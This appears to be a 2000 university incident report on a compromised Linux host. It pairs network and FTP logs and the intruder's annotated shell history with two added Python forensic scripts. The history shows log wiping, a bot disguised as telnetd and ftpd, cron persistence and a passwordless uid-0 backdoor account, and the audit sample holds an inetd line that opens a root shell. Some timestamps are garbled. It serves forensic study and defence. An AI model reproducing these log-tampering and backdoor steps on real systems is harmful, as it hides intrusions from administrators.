0222.07:39:56.152 0222.07:40:12.152 137.189.victim1 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 2 126
0222.07:40:00.152 0222.07:40:20.152 137.189.victim1 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 2 126
0222.07:40:29.792 0222.07:40:29.792 137.189.victim1 sss.188.179.38 11 1033( ) 4000 ( ) 1 38
0222.07:40:20.620 0222.07:40:35.116 137.189.victim1 xx0.yy0.33.45 06 53( domain ) 2211 ( ) 14 847
0222.07:40:52.300 0222.07:40:52.300 137.189.victim1 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:41:13.328 0222.07:41:32.996 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1552 ( ) 45 2131

This is the FTP transfer to McGill U. It matches the information provided by McGill U.

0222.12:57:46.837 0222.12:58:35.685 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 4 156
0222.12:58:25.737 0222.12:58:25.737 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 1 52
0222.12:58:32.517 0222.12:58:32.797 137.189.victim1 mmm.206.73.143 06 113( auth ) 3211 ( ) 3 164
0222.12:58:33.72 0222.12:58:53.756 137.189.victim1 mmm.206.73.143 06 1058( ) 21 ( ftp ) 9 506
0222.12:59:04.464 0222.12:59:04.464 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 1 60
0222.12:58:55.396 0222.12:58:55.700 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 2 112
0222.12:59:11.160 0222.12:59:11.160 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 1 60
0222.12:59:04.796 0222.12:59:04.796 137.189.victim1 mmm.206.73.143 06 1061( ) 20 (ftp-data ) 3 156
0222.12:58:56.36 0222.12:58:56.360 137.189.victim1 mmm.206.73.143 06 113( auth ) 3213 ( ) 3 164
0222.12:59:11.432 0222.12:59:11.432 137.189.victim1 mmm.206.73.143 06 1063( ) 20 (ftp-data ) 3 156
0222.12:58:56.688 0222.12:59:39.520 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 26 1542
0222.12:59:38.932 0222.12:59:38.932 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 1 60
0222.12:59:39.200 0222.12:59:39.200 137.189.victim1 mmm.206.73.143 06 1076( ) 20 (ftp-data ) 3 156
0222.12:59:29.108 0222.12:59:29.108 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 3 156
0222.12:59:28.820 0222.12:59:28.820 137.189.victim1 mmm.206.73.143 06 1065( ) 20 (ftp-data ) 1 60
0222.12:57:48.308 0222.12:59:39.876 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 102 8782
0222.12:59:33.384 0222.12:59:46.832 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 2 76
0222.13:01:09.916 0222.13:01:11.308 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 5 211
0222.13:02:02.892 0222.13:02:02.892 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38
0222.13:03:10.716 0222.13:03:10.716 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 1 60
0222.13:03:01.656 0222.13:03:hh.328 137.189.victim1 mmm.206.73.143 06 1060( ) 21 ( ftp ) 15 915
0222.13:03:20.308 0222.13:03:20.580 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 5 260
0222.13:03:10.1000 0222.13:03:11.944 137.189.victim1 mmm.206.73.143 06 1086( ) 20 (ftp-data ) 12 624
0222.13:03:20.32 0222.13:03:20.32 137.189.victim1 mmm.206.73.143 06 1087( ) 20 (ftp-data ) 1 60
0222.13:03:46.8hh. 0222.13:03:46.8hh. 137.189.victim1 sss.188.153.116 11 1027( ) 4000 ( ) 1 38
0222.13:03:01.656 0222.13:04:02.652 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 131 7300
0222.13:05:hh.331 0222.13:05:25.211 137.189.victim1 xxx.252.36.43 06 23( telnet ) 1062 ( ) 4 184

cove ftp victim1.ie.cuhk. Mon Feb 21 23:59 - 00:03 (00:04)
Mon Feb 21 23:59:28 2000 1 victim1.ie.cuhk.edu.hk 494 /tmp/egg/specialk.conf b _ o r cove ftp 0 * c
Mon Feb 21 23:59:39 2000 1 victim1.ie.cuhk.edu.hk 749 /tmp/egg/motd b _ o r cove ftp 0 * c
Tue Feb 22 00:03:10 2000 1 victim1.ie.cuhk.edu.hk 28hh. /tmp/egg/special-k.tcl b _ o r cove ftp 0 * c
Tue Feb 22 00:03:20 2000 1 victim1.ie.cuhk.edu.hk 6483 /tmp/egg/BitchX1.1.tcl b _ o r cove ftp 0 * c
(All times are North American Eastern, -0500 from UTC.)
Feb 22nd and afterwards

137.189.victim2 was running the eggdrop IRC bot.

April 7th

Received the security alert from McGill U and started the investigation.

Hacker Activities at 137.189.victim2

From /.bash_history we pick out the following; our annotation follows each group of commands:

whoami
less /var/log/secure
pico -w /var/log/secure

Tamper with the log.

w
ls
top
cat /etc/passwd
ls /data/home/ansers
ls /home/testtube
netstat
uptime
finger ansers
finger testtube
finger eric
finger recruit
ls /data
df
ls /data2
ls /
ls /download
cd ..
cd sbin
ls
ls -F
ls --color
cd ..
ls
cd etc
ls
cd ..
ls
ls bin
ls home
ls
ls mnt
ls mnt/cdrom
ls pef1
ls usr
cd usr/sbin
ls --color
cd ..
cd ..
ls
cd var
ls -F
cd ..
ls root
ls root -la
ls
ls bin -F

Explore the system environment.

ls
cd dev
ls
cd ..
ls
cd dev
mkdir e
cd e
ncftp
ls
tar -zxvf eggdrop1.4.2.tar.gz
cd eggdrop1.4.2
./configure
make
cp /tmp/hed .
ls /tmp
rm /tmp/hed
mv /tmp/BitchX1.1.tcl ./scripts/
mv /tmp/special-k.tcl ./scripts/
mv /tmp/wh0r3.tcl ./scripts/
mv /tmp/motd ./
ls /tmp
ls
pico -w hed
rm hed
w
ls
./assgroove
chmod u+x groove
chmod u+x assgroove
./assgroove
pwd
./eggdrop
./eggdrop -m assgroove
telnet localhost 2012

Build and run eggdrop.

w
cd scripts/
pico -w botchk
cd ..
ls -la
ps x
ls
mv assgroove in.telnetd
pico -w scripts/botchk
cd ..
./in.telnetd
ls -la in.tel
ls -la in.telnetd
ls
cd eggdrop1.4.2
./in.telnetd
ls -la in.telnetd
chmod +x in.telnetd
pico -w in.telnetd
pico -w in.telnetd
pico -w cron
crontab cron
crontab -l
scrbotchk
./scripts/botchk
ls
./in.telnetd
ls in.telnetd
ls -la in.telnetd
mv eggdrop in.ftpd
./scripts/botchk

Build the telnet trojan horse.

cd /
cd var/log
pico -w secure
ls
cat messages
ls
rm wtmp
last
mv wtmp.1 wtmp
tail xferlog
pico -w xferlog
ls
cd /root
ls
ls -la
history
rm .history

Clear the logs.

exit
useradd
adduser
/sbin/useradd
/sbi/nadduser
/sbin/adduser
/usr/local/sbin/adduser
/usr/local/sbin/useradd
locate
locate useradd
/usr/sbin/useradd
/usr/sbin/useradd deamon -d /tmp
cat /etc/passwd
chpasswd
passwd deamon
pico -w /etc/passwd

Create a backdoor account.

w
w
cd /var/log
pico -w secure
w
exit
pico -w secure
ls
cat xferlog
rm xferlog
ls
cat lastlog
ls
last
lastlog
rm lastlog
ls
mv wtmp.1 wtmp

Clear the logs.

locate egg
cd /dev/e/eggdrop1.4.2
mv /tmp/special-k.1.pre2.tcl ./scripts/
ls
cat in.ftpd
ps x
pico -w in.telnetd
logout
exit
cp /var/log/wtmp.1 /var/log/wtmp
cd /dev/e
ls
ncftp
w
cd /var/log
ls
tail secure
rm secure
dd > secure
cat xferlog.1
ls
exit

Clear the logs.

Files the hacker may have touched on that day (22nd Feb), listed with their access and modification times:
Access time			Modification time		Path
Mon Apr 10 12:07:55 2000	Tue Feb 22 13:51:27 2000	/
Mon Apr 10 12:07:55 2000	Tue Feb 22 16:16:54 2000	/data/home/ansers/source_code/ansers_dir/src_4
Mon Apr 10 12:07:56 2000	Tue Feb 22 16:03:hh.2000	/data/home/ansers/source_code/jasmine_dir/text
Mon Apr 10 12:07:56 2000	Tue Feb 22 15:51:11 2000	/data/home/ansers/public_html/DDL
Mon Apr 10 12:07:56 2000	Tue Feb 22 15:51:25 2000	/data/home/ansers/public_html/include
Fri Mar 31 23:52:02 2000	Tue Feb 22 15:53:06 2000	/data/home/ansers/public_html/cmpl
Thu Feb hh.19:50:23 2000	Tue Feb 22 11:58:07 2000	/data/home/ansers/public_html/C_prog/upload_batld.c
Wed Mar  1 22:03:03 2000	Tue Feb 22 11:59:55 2000	/data/home/ansers/public_html/C_prog/upload_batle.c
Thu Feb hh.19:51:33 2000	Tue Feb 22 11:58:19 2000	/data/home/ansers/public_html/upload_batld
Thu Feb hh.19:51:33 2000	Tue Feb 22 12:00:23 2000	/data/home/ansers/public_html/upload_batle
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:09:18 2000	/dev/e
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:09:54 2000	/dev/e/eggdrop1.4.2/doc
Tue Feb 22 13:09:54 2000	Tue Feb 22 13:09:55 2000	/dev/e/eggdrop1.4.2/doc/Makefile
Fri Apr  7 03:11:39 2000	Tue Feb 22 13:14:26 2000	/dev/e/eggdrop1.4.2/motd
Mon Apr 10 12:10:00 2000	Tue Feb 22 13:42:16 2000	/dev/e/eggdrop1.4.2/scripts/botchk
Tue Feb 22 13:09:55 2000	Tue Feb 22 13:09:55 2000	/dev/e/eggdrop1.4.2/scripts/Makefile
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:12:16 2000	/dev/e/eggdrop1.4.2/scripts/BitchX1.1.tcl
Mon Mar 27 06:18:10 2000	Tue Feb 22 13:12:30 2000	/dev/e/eggdrop1.4.2/scripts/special-k.tcl
Tue Apr  4 12:31:55 2000	Tue Feb 22 13:12:34 2000	/dev/e/eggdrop1.4.2/scripts/wh0r3.tcl
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:13:21 2000	/dev/e/eggdrop1.4.2/src
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:13:hh.2000	/dev/e/eggdrop1.4.2/src/md5
Tue Feb 22 13:13:21 2000	Tue Feb 22 13:09:56 2000	/dev/e/eggdrop1.4.2/src/md5/Makefile
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:13:25 2000	/dev/e/eggdrop1.4.2/src/md5/md5c.o
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:17:27 2000	/dev/e/eggdrop1.4.2/src/mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:13:30 2000	/dev/e/eggdrop1.4.2/src/mod/assoc.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:13:35 2000	/dev/e/eggdrop1.4.2/src/mod/blowfish.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:14:30 2000	/dev/e/eggdrop1.4.2/src/mod/channels.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:14:34 2000	/dev/e/eggdrop1.4.2/src/mod/console.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:14:38 2000	/dev/e/eggdrop1.4.2/src/mod/ctcp.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:15:12 2000	/dev/e/eggdrop1.4.2/src/mod/filesys.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:16:06 2000	/dev/e/eggdrop1.4.2/src/mod/irc.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:16:17 2000	/dev/e/eggdrop1.4.2/src/mod/notes.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:16:23 2000	/dev/e/eggdrop1.4.2/src/mod/seen.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:16:44 2000	/dev/e/eggdrop1.4.2/src/mod/server.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:17:02 2000	/dev/e/eggdrop1.4.2/src/mod/share.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:17:19 2000	/dev/e/eggdrop1.4.2/src/mod/transfer.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:17:26 2000	/dev/e/eggdrop1.4.2/src/mod/wire.mod
Fri Apr  7 04:08:38 2000	Tue Feb 22 13:17:27 2000	/dev/e/eggdrop1.4.2/src/mod/woobie.mod
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:09:56 2000	/dev/e/eggdrop1.4.2/src/mod/Makefile
Tue Feb 22 13:13:30 2000	Tue Feb 22 13:13:30 2000	/dev/e/eggdrop1.4.2/src/mod/assoc.o
Tue Feb 22 13:13:36 2000	Tue Feb 22 13:13:35 2000	/dev/e/eggdrop1.4.2/src/mod/blowfish.o
Tue Feb 22 13:14:30 2000	Tue Feb 22 13:14:30 2000	/dev/e/eggdrop1.4.2/src/mod/channels.o
Tue Feb 22 13:14:34 2000	Tue Feb 22 13:14:34 2000	/dev/e/eggdrop1.4.2/src/mod/console.o
Tue Feb 22 13:14:38 2000	Tue Feb 22 13:14:38 2000	/dev/e/eggdrop1.4.2/src/mod/ctcp.o
Tue Feb 22 13:15:12 2000	Tue Feb 22 13:15:12 2000	/dev/e/eggdrop1.4.2/src/mod/filesys.o
Tue Feb 22 13:16:06 2000	Tue Feb 22 13:16:06 2000	/dev/e/eggdrop1.4.2/src/mod/irc.o
Tue Feb 22 13:16:18 2000	Tue Feb 22 13:16:17 2000	/dev/e/eggdrop1.4.2/src/mod/notes.o
Tue Feb 22 13:16:23 2000	Tue Feb 22 13:16:23 2000	/dev/e/eggdrop1.4.2/src/mod/seen.o
Tue Feb 22 13:16:44 2000	Tue Feb 22 13:16:44 2000	/dev/e/eggdrop1.4.2/src/mod/server.o
Tue Feb 22 13:17:02 2000	Tue Feb 22 13:17:02 2000	/dev/e/eggdrop1.4.2/src/mod/share.o
Tue Feb 22 13:17:19 2000	Tue Feb 22 13:17:19 2000	/dev/e/eggdrop1.4.2/src/mod/transfer.o
Tue Feb 22 13:17:26 2000	Tue Feb 22 13:17:26 2000	/dev/e/eggdrop1.4.2/src/mod/wire.o
Tue Feb 22 13:17:28 2000	Tue Feb 22 13:17:27 2000	/dev/e/eggdrop1.4.2/src/mod/woobie.o
Tue Feb 22 13:10:32 2000	Tue Feb 22 13:09:55 2000	/dev/e/eggdrop1.4.2/src/Makefile
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:10:42 2000	/dev/e/eggdrop1.4.2/src/botcmd.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:10:49 2000	/dev/e/eggdrop1.4.2/src/botmsg.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:03 2000	/dev/e/eggdrop1.4.2/src/botnet.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:08 2000	/dev/e/eggdrop1.4.2/src/chanprog.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:30 2000	/dev/e/eggdrop1.4.2/src/cmds.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:45 2000	/dev/e/eggdrop1.4.2/src/dcc.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:50 2000	/dev/e/eggdrop1.4.2/src/dccutil.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:55 2000	/dev/e/eggdrop1.4.2/src/flags.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:11:59 2000	/dev/e/eggdrop1.4.2/src/language.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:05 2000	/dev/e/eggdrop1.4.2/src/main.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:06 2000	/dev/e/eggdrop1.4.2/src/mem.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:15 2000	/dev/e/eggdrop1.4.2/src/misc.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:18 2000	/dev/e/eggdrop1.4.2/src/modules.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:26 2000	/dev/e/eggdrop1.4.2/src/net.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:28 2000	/dev/e/eggdrop1.4.2/src/rfc1459.o
Tue Feb 22 13:13:25 2000	Tue Feb 22 13:12:32 2000	/dev/e/eggdrop1.4.2/src/tcl.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:12:42 2000	/dev/e/eggdrop1.4.2/src/tcldcc.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:12:50 2000	/dev/e/eggdrop1.4.2/src/tclhash.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:12:54 2000	/dev/e/eggdrop1.4.2/src/tclmisc.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:12:58 2000	/dev/e/eggdrop1.4.2/src/tcluser.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:13:05 2000	/dev/e/eggdrop1.4.2/src/userent.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:13:10 2000	/dev/e/eggdrop1.4.2/src/userrec.o
Tue Feb 22 13:13:26 2000	Tue Feb 22 13:13:21 2000	/dev/e/eggdrop1.4.2/src/users.o
Tue Feb 22 13:10:31 2000	Tue Feb 22 13:09:54 2000	/dev/e/eggdrop1.4.2/Makefile
Tue Feb 22 13:09:29 2000	Tue Feb 22 13:09:52 2000	/dev/e/eggdrop1.4.2/config.log
Tue Feb 22 13:17:26 2000	Tue Feb 22 13:09:58 2000	/dev/e/eggdrop1.4.2/config.h
Tue Feb 22 13:09:29 2000	Tue Feb 22 13:09:52 2000	/dev/e/eggdrop1.4.2/config.cache
Tue Feb 22 13:09:58 2000	Tue Feb 22 13:09:53 2000	/dev/e/eggdrop1.4.2/config.status
Tue Feb 22 13:10:31 2000	Tue Feb 22 13:10:31 2000	/dev/e/eggdrop1.4.2/EGGMOD.stamp
Tue Feb 22 13:17:26 2000	Tue Feb 22 13:09:56 2000	/dev/e/eggdrop1.4.2/lush.h
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:13:30 2000	/dev/e/eggdrop1.4.2/assoc.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:13:36 2000	/dev/e/eggdrop1.4.2/blowfish.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:14:30 2000	/dev/e/eggdrop1.4.2/channels.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:14:34 2000	/dev/e/eggdrop1.4.2/console.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:14:38 2000	/dev/e/eggdrop1.4.2/ctcp.so
Tue Feb 22 13:15:12 2000	Tue Feb 22 13:15:12 2000	/dev/e/eggdrop1.4.2/filesys.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:16:06 2000	/dev/e/eggdrop1.4.2/irc.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:16:18 2000	/dev/e/eggdrop1.4.2/notes.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:16:23 2000	/dev/e/eggdrop1.4.2/seen.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:16:44 2000	/dev/e/eggdrop1.4.2/server.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:17:02 2000	/dev/e/eggdrop1.4.2/share.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:17:19 2000	/dev/e/eggdrop1.4.2/transfer.so
Mon Apr 10 11:50:01 2000	Tue Feb 22 13:17:26 2000	/dev/e/eggdrop1.4.2/wire.so
Tue Feb 22 13:17:28 2000	Tue Feb 22 13:17:28 2000	/dev/e/eggdrop1.4.2/woobie.so
Tue Feb 22 13:46:31 2000	Tue Feb 22 13:45:55 2000	/dev/e/eggdrop1.4.2/cron
Mon Apr 10 11:50:00 2000	Tue Feb 22 13:13:26 2000	/dev/e/eggdrop1.4.2/in.ftpd
Mon Apr 10 11:46:32 2000	Tue Feb 22 13:46:31 2000	/var/spool/cron
Mon Apr 10 11:52:02 2000	Tue Feb 22 13:46:31 2000	/var/spool/cron/root
Fri Apr  7 04:08:39 2000	Tue Feb 22 07:40:02 2000	/var/named
Fri Apr  7 04:08:39 2000	Tue Feb 22 07:40:02 2000	/var/named/ADMROCKS    (empty directory created by the buffer overflow program)
Tue Apr  4 12:28:58 2000	Tue Feb 22 13:06:28 2000	/root/.ncftp/firewall
Tue Apr  4 12:28:58 2000	Tue Feb 22 13:09:00 2000	/root/.ncftp/prefs
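Added example, not the investigators' own tooling: Python code that turns the access/modification listing above into a timeline by sorting on modification time and splitting it into activity windows wherever more than an hour passes between writes (the 60-minute gap is an arbitrary choice). The input is a constructed subset of the listing, including one line whose time was anonymised, to show that such lines are counted and skipped rather than mis-parsed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: a subset of the listing above (atime, mtime, path).
SAMPLE_LISTING = """\
Mon Apr 10 12:07:55 2000\tTue Feb 22 13:51:27 2000\t/
Mon Apr 10 12:07:55 2000\tTue Feb 22 16:16:54 2000\t/data/home/ansers/source_code/ansers_dir/src_4
Mon Apr 10 12:07:56 2000\tTue Feb 22 16:03:hh.2000\t/data/home/ansers/source_code/jasmine_dir/text
Mon Apr 10 12:07:56 2000\tTue Feb 22 15:51:11 2000\t/data/home/ansers/public_html/DDL
Thu Feb hh.19:50:23 2000\tTue Feb 22 11:58:07 2000\t/data/home/ansers/public_html/C_prog/upload_batld.c
Wed Mar  1 22:03:03 2000\tTue Feb 22 11:59:55 2000\t/data/home/ansers/public_html/C_prog/upload_batle.c
Thu Feb hh.19:51:33 2000\tTue Feb 22 11:58:19 2000\t/data/home/ansers/public_html/upload_batld
Thu Feb hh.19:51:33 2000\tTue Feb 22 12:00:23 2000\t/data/home/ansers/public_html/upload_batle
Fri Apr  7 04:08:38 2000\tTue Feb 22 13:09:18 2000\t/dev/e
Fri Apr  7 04:08:38 2000\tTue Feb 22 13:09:54 2000\t/dev/e/eggdrop1.4.2/doc
Fri Apr  7 03:11:39 2000\tTue Feb 22 13:14:26 2000\t/dev/e/eggdrop1.4.2/motd
Tue Feb 22 13:46:31 2000\tTue Feb 22 13:45:55 2000\t/dev/e/eggdrop1.4.2/cron
Mon Apr 10 11:50:00 2000\tTue Feb 22 13:13:26 2000\t/dev/e/eggdrop1.4.2/in.ftpd
Mon Apr 10 11:46:32 2000\tTue Feb 22 13:46:31 2000\t/var/spool/cron
Mon Apr 10 11:52:02 2000\tTue Feb 22 13:46:31 2000\t/var/spool/cron/root
Fri Apr  7 04:08:39 2000\tTue Feb 22 07:40:02 2000\t/var/named
Fri Apr  7 04:08:39 2000\tTue Feb 22 07:40:02 2000\t/var/named/ADMROCKS    (empty directory created by the buffer overflow program)
Tue Apr  4 12:28:58 2000\tTue Feb 22 13:06:28 2000\t/root/.ncftp/firewall
Tue Apr  4 12:28:58 2000\tTue Feb 22 13:09:00 2000\t/root/.ncftp/prefs
"""

# atime is matched loosely (it may be anonymised); mtime must be a complete
# ctime-style stamp, and the path is the first token after it.
LINE_RE = re.compile(
    r"^(?P<atime>\S.*?\d{4})\s+"
    r"(?P<mtime>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4})\s+"
    r"(?P<path>\S+)")


def parse_listing(text):
    """Return (sorted [(mtime, path)], number of lines skipped)."""
    entries, skipped = [], 0
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            skipped += 1  # header lines, blank lines, anonymised timestamps
            continue
        try:
            mtime = datetime.strptime(m["mtime"], "%a %b %d %H:%M:%S %Y")
        except ValueError:
            skipped += 1
            continue
        entries.append((mtime, m["path"]))
    return sorted(entries), skipped


def sessions(entries, max_gap=timedelta(minutes=60)):
    """Split a sorted (mtime, path) list into activity windows: a new window
    starts whenever the gap since the previous write exceeds max_gap."""
    out = []
    for mtime, path in entries:
        if out and mtime - out[-1]["end"] <= max_gap:
            out[-1]["end"] = mtime
            out[-1]["paths"].append(path)
        else:
            out.append({"start": mtime, "end": mtime, "paths": [path]})
    return out


def timeline_report(text):
    entries, skipped = parse_listing(text)
    lines = ["%d entries, %d skipped" % (len(entries), skipped)]
    for s in sessions(entries):
        lines.append("%s - %s  %2d files, first: %s" % (
            s["start"].strftime("%H:%M:%S"), s["end"].strftime("%H:%M:%S"),
            len(s["paths"]), s["paths"][0]))
    return "\n".join(lines)


if __name__ == "__main__":
    print(timeline_report(SAMPLE_LISTING))
```

On the sample this yields four windows: the two /var/named entries at 07:40:02, the upload_bat* files just before noon, the eggdrop build and cron installation between 13:06 and 13:51, and the ansers files in the late afternoon. Only modification times are used because the access times in the listing were overwritten by the investigation itself in April.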


The hacker's backdoor accounts (/etc/passwd entries):
server::0:0::/:/bin/bash
cove:x:900:100::/tmp:/bin/bash
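Added example, not from the report: a Python audit of the three host-based indicators this case leaves behind, a passwd entry with uid 0 or an empty password field (as in the two accounts above), an inetd entry that hands a connection straight to a shell (as in the ingreslock line shown in the demo), and a cron job run out of /dev or /tmp (the bot was built under /dev/e and a crontab was installed). The passwd and inetd sample lines are the ones on this page plus ordinary entries for contrast; the crontab line is constructed, since the real crontab content is not shown.

```python
import os

SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/")

# Constructed samples. The two backdoor accounts and the ingreslock line are
# the ones shown in this report; the other lines are ordinary entries added
# for contrast, and the crontab is invented (the real one is not shown).
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "nobody:x:99:99:Nobody:/:",
    "server::0:0::/:/bin/bash",
    "cove:x:900:100::/tmp:/bin/bash",
]
SAMPLE_INETD = [
    "ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a",
    "telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd",
    "ingreslock stream tcp nowait root /bin/sh sh -i",
]
SAMPLE_CRON = [
    "0 4 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/10 * * * * /dev/e/eggdrop1.4.2/scripts/botchk",
]


def _is_shell(path):
    return os.path.basename(path) in SHELLS


def audit_passwd(lines):
    """Return (account, reason) pairs for entries that look like backdoors."""
    findings = []
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, _gid, _gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field: logs in without a password"))
        norm_home = home.rstrip("/") + "/"  # "/" stays "/", "/tmp" becomes "/tmp/"
        if _is_shell(shell) and (norm_home == "/" or norm_home.startswith(SCRATCH_DIRS)):
            findings.append((name, "interactive shell with home directory %s" % home))
    return findings


def audit_inetd(lines):
    """Flag inetd.conf entries that hand a connection straight to a shell or
    run their server program from a scratch directory."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        service, _sock, _proto, _wait, user, server = fields[:6]
        if _is_shell(server):
            findings.append((service, "connection handed directly to %s as %s" % (server, user)))
        if server.startswith(SCRATCH_DIRS):
            findings.append((service, "server program in scratch directory: %s" % server))
    return findings


def audit_crontab(lines):
    """Flag cron jobs whose command line references a scratch directory."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 6 or fields[0].startswith("#"):
            continue
        for token in fields[5:]:
            if token.startswith(SCRATCH_DIRS):
                findings.append((" ".join(fields[5:]), "runs %s from a scratch directory" % token))
                break
    return findings


if __name__ == "__main__":
    for source, result in (("passwd", audit_passwd(SAMPLE_PASSWD)),
                           ("inetd.conf", audit_inetd(SAMPLE_INETD)),
                           ("crontab", audit_crontab(SAMPLE_CRON))):
        for item, reason in result:
            print("%-10s %-12s %s" % (source, item, reason))
```

The home-directory test is combined with the shell test on purpose: system accounts such as nobody legitimately have "/" as home but no interactive shell, whereas an account with a shell and a home of "/" or /tmp, like the two above, is a reliable sign of manual editing of /etc/passwd.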

References:

Original files and logs at 137.189.victim2
.bash_history

http://www.cert.org/advisories/CA-99-14-bind.html